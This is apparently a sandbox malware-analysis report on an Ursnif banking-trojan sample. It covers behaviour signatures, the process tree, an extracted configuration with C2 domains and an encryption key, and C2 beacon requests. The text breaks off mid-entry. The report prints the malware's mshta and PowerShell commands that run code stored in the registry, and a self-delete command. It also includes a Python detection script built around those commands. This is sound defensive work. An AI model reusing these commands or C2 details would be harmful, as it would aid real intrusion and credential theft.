
Windows Analysis Report FpYf5EGDO9.exe

Overview

General Information

Sample Name: FpYf5EGDO9.exe
Analysis ID: 527488
MD5: 2f1743897afa6f586ae97f53bf55c14e
SHA1: 21a51f4a3fa0c65509a1c7ef640f7e6b779aee49
SHA256: 440c297bcaa0e4ca3d84281d524b8351ad1ea2b5aabb22795db824a356cd54bd
Tags: exe, Gozi, ISFB, Ursnif

Detection

Ursnif
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected unpacking (overwrites its own PE header)
Yara detected Ursnif
System process connects to network (likely due to code injection or exploit)
Detected unpacking (changes PE section rights)
Found malware configuration
Sigma detected: Powershell run code from registry
Multi AV Scanner detection for submitted file
Sigma detected: Encoded IEX
Tries to steal Mail credentials (via file / registry access)
Hooks registry keys query functions (used to hide registry keys)
Maps a DLL or memory area into another process
Uses nslookup.exe to query domains
Writes or reads registry keys via WMI
Machine Learning detection for sample
Allocates memory in foreign processes
May check the online IP address of the machine
Self deletion via cmd delete
Sigma detected: MSHTA Spawning Windows Shell
Creates a thread in another existing process (thread injection)
Disables SPDY (HTTP compression, likely to perform web injects)
Modifies the export address table of user mode modules (user mode EAT hooks)
Writes registry values via WMI
Tries to harvest and steal browser information (history, passwords, etc)
Writes to foreign memory regions
Changes memory attributes in foreign processes to executable or writable
Suspicious powershell command line found
Uses ping.exe to check the status of other devices and networks
Modifies the prolog of user mode functions (user mode inline hooks)
Uses ping.exe to sleep
Injects code into the Windows Explorer (explorer.exe)
Modifies the context of a thread in another process (thread injection)
Sigma detected: Mshta Spawning Windows Shell
Sigma detected: Suspicious Csc.exe Source File Folder
Modifies the import address table of user mode modules (user mode IAT hooks)
Antivirus or Machine Learning detection for unpacked file
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to dynamically determine API calls
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Searches for the Microsoft Outlook file path
PE file contains strange resources
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Compiles C# or VB.Net code
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Sigma detected: Suspicious Rundll32 Activity
Internet Provider seen in connection with other malware
Contains functionality to query CPU information (cpuid)
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Creates a DirectInput object (often for capturing keystrokes)
Sample file is different than original file name gathered from version info


Process Tree

  • System is w10x64
  • FpYf5EGDO9.exe (PID: 5556 cmdline: "C:\Users\user\Desktop\FpYf5EGDO9.exe" MD5: 2F1743897AFA6F586AE97F53BF55C14E)
    • control.exe (PID: 2904 cmdline: C:\Windows\system32\control.exe -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)
      • explorer.exe (PID: 3352 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • cmd.exe (PID: 7028 cmdline: C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\FpYf5EGDO9.exe MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
          • conhost.exe (PID: 5016 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • PING.EXE (PID: 4712 cmdline: ping localhost -n 5 MD5: 6A7389ECE70FB97BFE9A570DB4ACCC3B)
        • RuntimeBroker.exe (PID: 4084 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: C7E36B4A5D9E6AC600DD7A0E0D52DAC5)
        • RuntimeBroker.exe (PID: 4176 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: C7E36B4A5D9E6AC600DD7A0E0D52DAC5)
        • RuntimeBroker.exe (PID: 4440 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: C7E36B4A5D9E6AC600DD7A0E0D52DAC5)
        • RuntimeBroker.exe (PID: 4544 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: C7E36B4A5D9E6AC600DD7A0E0D52DAC5)
        • cmd.exe (PID: 6536 cmdline: cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\2227.bi1" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
          • conhost.exe (PID: 6736 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • nslookup.exe (PID: 5192 cmdline: nslookup myip.opendns.com resolver1.opendns.com MD5: AF1787F1DBE0053D74FC687E7233F8CE)
        • RuntimeBroker.exe (PID: 1504 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: C7E36B4A5D9E6AC600DD7A0E0D52DAC5)
        • cmd.exe (PID: 3424 cmdline: cmd /C "echo -------- >> C:\Users\user\AppData\Local\Temp\2227.bi1" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
          • conhost.exe (PID: 5208 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • cmd.exe (PID: 6088 cmdline: "C:\Windows\syswow64\cmd.exe" /C pause dll mail, , MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • conhost.exe (PID: 5660 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • rundll32.exe (PID: 6080 cmdline: "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h MD5: 73C519F050C20580F8A62C849D49215A)
  • mshta.exe (PID: 4720 cmdline: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Mq8m='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Mq8m).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script> MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
    • powershell.exe (PID: 4856 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex ([System.Text.Encoding]::ASCII.GetString(( gp "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 4488 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 6736 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\i1aaekli.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 6272 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESDB8.tmp" "c:\Users\user\AppData\Local\Temp\CSCDF07F97C5B754580AFABDA449268F624.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • csc.exe (PID: 5464 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4v5gswf4.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 6088 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2A77.tmp" "c:\Users\user\AppData\Local\Temp\CSCB9A7ABF6D51B4A89B4972FF51D6A5D9.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
  • cleanup

Malware Configuration

Threatname: Ursnif

{
  "RSA Public Key": "dm+RfNkITE5FceWriGPYkZaFfoP/k2XQ2jeLd8rNgFw6gJ6fNWsHd0U6akxsQHth/SBWm4/eMI9Y1qgwNJteasgQsUC7Ht20y96mIxH1hvPh9uvLSH5z2CNo+fcP8K+V0yoOOQzDln/qE7mMJHLu+rmogHE7S6lb7FVy/7xxrRe3zMDt5K9bDwOreWw0blGE",
  "c2_domain": ["yahoo.com", "soderunovos.website", "qoderunovos.website", "https://soderunovos.website", "https://qoderunovos.website"],
  "botnet": "4482",
  "server": "12",
  "serpent_key": "10291029JSJUYNHG",
  "sleep_time": "10",
  "CONF_TIMEOUT": "20",
  "SetWaitableTimer_value": "0",
  "dga_base_url": "constitution.org/usdeclar.txt",
  "dga_tld": "com ru org",
  "DGA_count": "10"
}

Yara Overview

Memory Dumps

Source                                                               Rule                  Description           Author
0000000E.00000003.484252773.000001A99926C000.00000004.00000040.sdmp  JoeSecurity_Ursnif    Yara detected Ursnif  Joe Security
0000001F.00000000.537482070.000001B888D00000.00000040.00020000.sdmp  JoeSecurity_Ursnif_1  Yara detected Ursnif  Joe Security
00000024.00000000.646320070.000001EAE4570000.00000040.00020000.sdmp  JoeSecurity_Ursnif_1  Yara detected Ursnif  Joe Security
0000001F.00000000.536149519.000001B888D00000.00000040.00020000.sdmp  JoeSecurity_Ursnif_1  Yara detected Ursnif  Joe Security
0000002C.00000003.696288190.0000000003DF8000.00000004.00000040.sdmp  JoeSecurity_Ursnif    Yara detected Ursnif  Joe Security
(61 further entries not shown)

            Unpacked PEs

Source                                    Rule                  Description           Author
0.3.FpYf5EGDO9.exe.43394a0.11.raw.unpack  JoeSecurity_Ursnif_1  Yara detected Ursnif  Joe Security
0.3.FpYf5EGDO9.exe.48794a0.3.raw.unpack   JoeSecurity_Ursnif_1  Yara detected Ursnif  Joe Security
0.3.FpYf5EGDO9.exe.47fa4a0.1.unpack       JoeSecurity_Ursnif_1  Yara detected Ursnif  Joe Security
0.3.FpYf5EGDO9.exe.47fa4a0.1.raw.unpack   JoeSecurity_Ursnif_1  Yara detected Ursnif  Joe Security
0.2.FpYf5EGDO9.exe.3c40000.2.unpack       JoeSecurity_Ursnif_1  Yara detected Ursnif  Joe Security
(2 further entries not shown)

Sigma Overview

System Summary:

Sigma detected: Encoded IEX
Source: Process started. Author: Florian Roth. Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex ([System.Text.Encoding]::ASCII.GetString(( gp "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex ([System.Text.Encoding]::ASCII.GetString(( gp "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Mq8m='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Mq8m).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 4720, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex ([System.Text.Encoding]::ASCII.GetString(( gp "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), ProcessId: 4856
Sigma detected: MSHTA Spawning Windows Shell
Source: Process started. Author: Michael Haag. Data: the same process start event as for "Encoded IEX" above (powershell.exe, ProcessId 4856, ParentImage C:\Windows\System32\mshta.exe, ParentProcessId 4720)
Sigma detected: Mshta Spawning Windows Shell
Source: Process started. Author: Florian Roth. Data: the same process start event as for "Encoded IEX" above (powershell.exe, ProcessId 4856, ParentImage C:\Windows\System32\mshta.exe, ParentProcessId 4720)
Sigma detected: Suspicious Csc.exe Source File Folder
Source: Process started. Author: Florian Roth. Data: Command: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\i1aaekli.cmdline, CommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\i1aaekli.cmdline, CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex ([System.Text.Encoding]::ASCII.GetString(( gp "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)), ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 4856, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\i1aaekli.cmdline, ProcessId: 6736
Sigma detected: Suspicious Rundll32 Activity
Source: Process started. Author: juju4, Jonhnathan Ribeiro, oscd.community. Data: Command: "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h, CommandLine: "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h, CommandLine|base64offset|contains: , Image: C:\Windows\System32\rundll32.exe, NewProcessName: C:\Windows\System32\rundll32.exe, OriginalFileName: C:\Windows\System32\rundll32.exe, ParentCommandLine: C:\Windows\system32\control.exe -h, ParentImage: C:\Windows\System32\control.exe, ParentProcessId: 2904, ProcessCommandLine: "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h, ProcessId: 6080
Sigma detected: Non Interactive PowerShell
Source: Process started. Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements). Data: the same process start event as for "Encoded IEX" above (powershell.exe, ProcessId 4856, ParentImage C:\Windows\System32\mshta.exe, ParentProcessId 4720)
Sigma detected: T1086 PowerShell Execution
Source: Pipe created. Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research). Data: PipeName: \PSHost.132822035693761408.4856.DefaultAppDomain.powershell

Data Obfuscation:

Sigma detected: Powershell run code from registry
Source: Process started. Author: Joe Security. Data: the same process start event as for "Encoded IEX" above (powershell.exe, ProcessId 4856, ParentImage C:\Windows\System32\mshta.exe, ParentProcessId 4720)
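The process tree and the Sigma hits above describe one execution chain: mshta.exe runs an inline HTA that reads a script out of HKCU\Software\AppDataLow\Software\Microsoft\<GUID>, that script spawns powershell.exe which IEXes another registry value, PowerShell compiles C# from %TEMP% via csc.exe, and the injected explorer.exe runs nslookup against myip.opendns.com and a "ping localhost -n 5 && del" self-delete. The block below is an added example, not part of the Joe Sandbox report and not the published Sigma rules: each predicate is my own compact rendering of a rule or signature name the report lists, run over process-creation events constructed from a subset of the report's process tree (same PIDs, images and command lines). Names such as ProcEvent, SHELLS and IP_ECHO_HOSTS are mine.

```python
"""Process-tree detections for the Ursnif chain in this report.

Added example, not part of the Joe Sandbox report and not the published Sigma
rules: each predicate is my own compact rendering of a rule or signature name
the report lists. The events are a subset of the report's process tree
(same PIDs, images and command lines), constructed here as test input.
"""
import re
from dataclasses import dataclass

@dataclass(frozen=True)
class ProcEvent:
    pid: int
    image: str
    cmdline: str
    parent_pid: int
    parent_image: str

def _base(path):
    """Lower-case file name of an image path."""
    return path.rsplit("\\", 1)[-1].lower()

SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe"}
IP_ECHO_HOSTS = {"myip.opendns.com"}   # "what is my IP" names; extend as needed

def mshta_spawns_shell(e):            # Sigma: MSHTA Spawning Windows Shell
    return _base(e.parent_image) == "mshta.exe" and _base(e.image) in SHELLS

def mshta_inline_hta(e):              # whole HTA on the command line, script read from registry
    c = e.cmdline.lower()
    return _base(e.image) == "mshta.exe" and "<script" in c and "regread(" in c

def powershell_code_from_registry(e): # Sigma: Powershell run code from registry / Encoded IEX
    c = e.cmdline.lower()
    return (_base(e.image) == "powershell.exe"
            and re.search(r"\b(iex|invoke-expression)\b", c) is not None
            and re.search(r"\b(gp|get-itemproperty)\s+['\"]?hk(cu|lm):", c) is not None)

def csc_source_in_temp(e):            # Sigma: Suspicious Csc.exe Source File Folder
    c = e.cmdline.lower()
    return (_base(e.image) == "csc.exe"
            and re.search(r'@"?[^"\s]*\\appdata\\local\\temp\\', c) is not None)

def cmd_self_delete_via_ping(e):      # Self deletion via cmd delete + ping used as sleep
    c = e.cmdline.lower()
    return (_base(e.image) == "cmd.exe"
            and re.search(r"ping\s+(localhost|127\.0\.0\.1)\s+-n\s+\d+.*&&\s*del\s", c) is not None)

def nslookup_external_ip(e):          # May check the online IP address of the machine
    return _base(e.image) == "nslookup.exe" and any(h in e.cmdline.lower() for h in IP_ECHO_HOSTS)

RULES = [mshta_spawns_shell, mshta_inline_hta, powershell_code_from_registry,
         csc_source_in_temp, cmd_self_delete_via_ping, nslookup_external_ip]

def detect(events):
    """Return sorted (pid, rule name) pairs for every event that trips a rule."""
    return sorted((e.pid, r.__name__) for e in events for r in RULES if r(e))

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
MSHTA = r"C:\Windows\System32\mshta.exe"
EVENTS = [  # constructed from the report's process tree
    ProcEvent(3352, r"C:\Windows\explorer.exe", r"C:\Windows\Explorer.EXE",
              2904, r"C:\Windows\System32\control.exe"),
    ProcEvent(7028, r"C:\Windows\System32\cmd.exe",
              r'C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\FpYf5EGDO9.exe',
              3352, r"C:\Windows\explorer.exe"),
    ProcEvent(6536, r"C:\Windows\System32\cmd.exe",
              r'cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\2227.bi1"',
              3352, r"C:\Windows\explorer.exe"),
    ProcEvent(5192, r"C:\Windows\System32\nslookup.exe",
              r"nslookup myip.opendns.com resolver1.opendns.com", 6536, r"C:\Windows\System32\cmd.exe"),
    ProcEvent(4720, MSHTA,
              r'''C:\Windows\System32\mshta.exe" "about:<hta:application><script>Mq8m='wscript.shell';'''
              r'''resizeTo(0,2);eval(new ActiveXObject(Mq8m).regread('HKCU\\Software\\AppDataLow\\Software'''
              r'''\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\TestLocal'));if(!window.flag)close()</script>''',
              0, ""),
    ProcEvent(4856, PS,
              '"' + PS + r'" iex ([System.Text.Encoding]::ASCII.GetString(( gp "HKCU:Software\AppDataLow'
              r'\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))',
              4720, MSHTA),
    ProcEvent(6736, r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe",
              r'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths '
              r'@"C:\Users\user\AppData\Local\Temp\i1aaekli.cmdline', 4856, PS),
]

if __name__ == "__main__":
    for pid, rule in detect(EVENTS):
        print(f"PID {pid}: {rule}")
```

Each predicate keys on the parent/child relationship or on the command line alone, so the same functions apply to Sysmon Event ID 1 or Windows 4688 records once they are mapped into ProcEvent. The explorer.exe event is included as a negative case: the injected host process itself trips nothing here, which is why the network evidence under "System process connects to network" matters.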

Jbx Signature Overview

AV Detection:

Found malware configuration
Source: 00000000.00000002.510101213.0000000002140000.00000040.00000001.sdmp. Malware Configuration Extractor: Ursnif {"RSA Public Key": "dm+RfNkITE5FceWriGPYkZaFfoP/k2XQ2jeLd8rNgFw6gJ6fNWsHd0U6akxsQHth/SBWm4/eMI9Y1qgwNJteasgQsUC7Ht20y96mIxH1hvPh9uvLSH5z2CNo+fcP8K+V0yoOOQzDln/qE7mMJHLu+rmogHE7S6lb7FVy/7xxrRe3zMDt5K9bDwOreWw0blGE", "c2_domain": ["yahoo.com", "soderunovos.website", "qoderunovos.website", "https://soderunovos.website", "https://qoderunovos.website"], "botnet": "4482", "server": "12", "serpent_key": "10291029JSJUYNHG", "sleep_time": "10", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0", "dga_base_url": "constitution.org/usdeclar.txt", "dga_tld": "com ru org", "DGA_count": "10"}
Multi AV Scanner detection for submitted file
Source: FpYf5EGDO9.exe. Virustotal: Detection: 46%
Machine Learning detection for sample
Source: FpYf5EGDO9.exe. Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 0.2.FpYf5EGDO9.exe.400000.0.unpack. Avira: Label: TR/Crypt.XPACK.Gen7
Source: 0.2.FpYf5EGDO9.exe.2140e50.1.unpack. Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.FpYf5EGDO9.exe.2150000.0.unpack. Avira: Label: TR/Patched.Ren.Gen

Compliance:

Detected unpacking (overwrites its own PE header)
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe. Unpacked PE file: 0.2.FpYf5EGDO9.exe.400000.0.unpack
Source: FpYf5EGDO9.exe. Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe. File opened: C:\Windows\SysWOW64\msvcr100.dll
Source: unknown. HTTPS traffic detected: 74.6.143.26:443 -> 192.168.2.3:49747 version: TLS 1.2
Source: unknown. HTTPS traffic detected: 87.248.100.216:443 -> 192.168.2.3:49748 version: TLS 1.2
Source: unknown. HTTPS traffic detected: 89.44.9.140:443 -> 192.168.2.3:49751 version: TLS 1.2
Source: unknown. HTTPS traffic detected: 209.202.254.90:443 -> 192.168.2.3:49817 version: TLS 1.2
Source: unknown. HTTPS traffic detected: 209.202.254.90:443 -> 192.168.2.3:49818 version: TLS 1.2
Source: unknown. HTTPS traffic detected: 87.248.118.22:443 -> 192.168.2.3:49820 version: TLS 1.2
Source: unknown. HTTPS traffic detected: 212.82.100.140:443 -> 192.168.2.3:49821 version: TLS 1.2
Source: Binary string: .C:\Users\user\AppData\Local\Temp\4v5gswf4.pdb source: powershell.exe, 0000000E.00000002.590858233.000001A9845FD000.00000004.00000001.sdmp
Source: Binary string: .C:\Users\user\AppData\Local\Temp\4v5gswf4.pdbXP source: powershell.exe, 0000000E.00000002.590858233.000001A9845FD000.00000004.00000001.sdmp
Source: Binary string: SC:\gapajoxo-luhibomihi za.pdbP+CD source: FpYf5EGDO9.exe
Source: Binary string: C:\gapajoxo-luhibomihi za.pdb source: FpYf5EGDO9.exe
Source: Binary string: ntdll.pdb source: FpYf5EGDO9.exe, 00000000.00000003.458681957.0000000005D50000.00000004.00000001.sdmp
Source: Binary string: ntdll.pdbUGP source: FpYf5EGDO9.exe, 00000000.00000003.458681957.0000000005D50000.00000004.00000001.sdmp
Source: Binary string: .C:\Users\user\AppData\Local\Temp\i1aaekli.pdb source: powershell.exe, 0000000E.00000002.590639322.000001A9845B8000.00000004.00000001.sdmp
Source: Binary string: .C:\Users\user\AppData\Local\Temp\i1aaekli.pdbXP source: powershell.exe, 0000000E.00000002.590858233.000001A9845FD000.00000004.00000001.sdmp
Source: C:\Windows\SysWOW64\cmd.exe. Code function: 44_2_0374A2FE lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError
Source: C:\Windows\SysWOW64\cmd.exe. Code function: 44_2_0373E9AC memset,FindFirstFileW,memset,wcscpy,RtlEnterCriticalSection,RtlLeaveCriticalSection,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,FindNextFileW,WaitForSingleObject,FindClose

Networking:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe. Domain query: lycos.com
Source: C:\Windows\explorer.exe. Domain query: mail.yahoo.com
Source: C:\Windows\explorer.exe. Domain query: login.yahoo.com
Source: C:\Windows\explorer.exe. Domain query: www.lycos.com
Uses nslookup.exe to query domains
Source: C:\Windows\System32\cmd.exe. Process created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
May check the online IP address of the machine
Source: C:\Windows\System32\nslookup.exe. DNS query: name: myip.opendns.com
Uses ping.exe to check the status of other devices and networks
Source: C:\Windows\System32\cmd.exe. Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View. JA3 fingerprint: 57f3642b4e37e28f5cbe3020c9331b4c
Source: Joe Sandbox View. JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Uses a known web browser user agent for HTTP communication
Source: global traffic. HTTP traffic detected:
    GET /jdraw/HHAQ457B0GtLskLkv/Zizh9TthhcPc/xT0iS3Qjl7y/kpH0MqC4dszB3H/HWmjHuRTfALKqcqKHLe5h/5KAnfOS4i_2BLVi7/2L64u5xwvTf3sXp/UrLoeHhSH12GKB9jsQ/3izuuqgp_/2BeydbeuNgrndFBMAfCQ/MxSWsDqksAzA_2F87xp/N1In9Bv1C1YQS1KkwHJ10H/TNNv.crw HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
    Host: yahoo.com
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: global traffic. HTTP traffic detected:
    GET /jdraw/HHAQ457B0GtLskLkv/Zizh9TthhcPc/xT0iS3Qjl7y/kpH0MqC4dszB3H/HWmjHuRTfALKqcqKHLe5h/5KAnfOS4i_2BLVi7/2L64u5xwvTf3sXp/UrLoeHhSH12GKB9jsQ/3izuuqgp_/2BeydbeuNgrndFBMAfCQ/MxSWsDqksAzA_2F87xp/N1In9Bv1C1YQS1KkwHJ10H/TNNv.crw HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
    Connection: Keep-Alive
    Cache-Control: no-cache
    Host: www.yahoo.com
    Cookie: B=emaekhlgpqi05&b=3&s=ke
Source: global traffic. HTTP traffic detected:
    GET /jdraw/0YhG8dyRv9LD/mE_2FqtpH8f/iA2o2vkhZI6Ka5/bM6HfTgg8_2Fnm82bns_2/FQ3LtU8rWKiGuaw8/NuVUF4C1kJEvzo9/4q_2FzKx_2BoAuXF6T/M0a9puLXo/g7QZ3Z41pnSqstIxrJFr/XQfDXm0MsROvBP6zJyK/pIVUVQiiCBcAOAJCd7Rzb1/y_2BZhUKXYwpc/xuZh04Cte3g_2F/_2Bc.crw HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
    Host: soderunovos.website
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: global traffic. HTTP traffic detected:
    GET /jdraw/8_2FELbHd/vcKlysS2_2B8o4xm4kBA/fbRTQSqR8KhaRfcmG4D/_2BYwGT6a_2BctWO8vLxko/alAFtnlNlG6Q7/I30RLNMi/fUrGHRWZ_2Br2a8odLCOSy2/Pp0uf39xNF/zw_2Bgb01eHiph9fS/HUtF_2BI_2FW/KJsziSAbwfK/PI_2FrcgGvn_2F/if7htk49j1cWEP5dTbASH/YfWHdUallNi/oU.crw HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
    Host: soderunovos.website
    Connection: Keep-Alive
    Cache-Control: no-cache
    Cookie: PHPSESSID=hvn8dm2743er2gc0b5q06914n7; lang=en
Source: global traffic. HTTP traffic detected:
    GET /jdraw/4HxkLkhxWL_2FVANLY1/THbawZOPrnWBhU0uh241NM/FRF0QIjHzIK9t/dTYxInYO/rat2KiIdmFuMYJV01lFIUuv/pv1M_2F42q/2ghlrrK6HyvaK1iGn/6FWd3U6RwdJs/DwljQfV1T1s/A2jFEhH_2FVbra/gemmgKqmTU3dGSSrHsVgF/6KFwQzXOgNC787ml/o9EUNqnCP/_2FVV.crw HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
    Host: soderunovos.website
    Connection: Keep-Alive
    Cache-Control: no-cache
    Cookie: PHPSESSID=hvn8dm2743er2gc0b5q06914n7; lang=en
Source: global traffic. HTTP traffic detected:
    GET /images/D9OpVtR6ch7yaXQM/EaD5xW8ABdTYyBP/Gt4cJ_2FjFXycO4TGu/MCD9o93qF/gcXCxsJliTt7CsKUUThQ/_2BQOzGD7VTScWFbBq7/rYz6zqd1hDOgClF7ZjyuP0/PVO4xmcJgwOqT/bRFkn69p/urNzBLvaZk_2FHiycO_2Fnk/NDLAeqS6wj/HuFpoxGxaXolfyDuy/j3x_2FwiqF8u/_2BNOdDri_2/BxGc1t_2BdTChs/9z_2Fo9enBDmQdKXyPaDP/tbX9QQQWLbdOHznP/nJCwvBsm_2F/C.jpeg HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)
    Host: lycos.com
    Connection: Keep-Alive
    Cache-Control: no-cache
Source: global traffic. HTTP traffic detected:
